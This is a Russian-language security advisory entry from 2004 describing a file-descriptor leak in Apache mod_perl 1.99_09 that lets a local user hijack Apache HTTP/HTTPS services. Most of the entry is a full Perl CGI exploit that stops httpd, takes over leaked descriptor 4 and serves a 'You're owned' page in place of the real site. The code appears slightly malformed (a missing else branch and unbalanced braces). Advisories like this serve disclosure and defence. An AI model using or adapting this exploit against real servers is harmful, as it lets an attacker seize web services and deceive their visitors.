Дата публикации: | 23.01.2004 |
Всего просмотров: | 1673 |
Опасность: | Низкая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Apache mod_perl 1.99_09; Tested on Apache 2.0.47
Описание: Уязвимость обнаружена в mod_perl для Apache web сервера. Локальный пользователь может внедриться в Apache http и https службы. Обнаружена утечка критичкских файловых дескрипторов в mod_perl на Apache 2.0.x В результате локальный пользователь может создать Perl CGI приложение, которое возьмет под контроль уязвимые службы. Пример/Эксплоит: #!/usr/bin/perl use POSIX qw(setsid); if (!defined(my $pid = fork)) { print "Content-Type: text/html\n\n"; print "cannot fork: $!"; exit 1; } elsif ($pid) { # This is the parent sleep(1); print "Content-Type: text/html\n\n"; print "<html><body>Exploit installed</body></html>"; system '/usr/sbin/httpd2 -k stop'; sleep(2); exit 0; # This is the Child setsid; sleep(2); my $leak = 4; open(Server, "+<&$leak"); while (1) { my $rin = ''; vec($rin,fileno(Server),1) = 1; $nfound = select($rout = $rin, undef, undef, undef); if (accept(Client,Server) ) { print Client "HTTP/1.0 200 OK\n"; print Client "Content-Length: 40\n"; print Client "Content-Type: text/html\n\n"; print Client "<html><body>"; print Client "You're owned."; print Client "</body></html>"; close Client; } URL производителя:http://perl.apache.org Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Hijacking Apache 2 via mod_perl |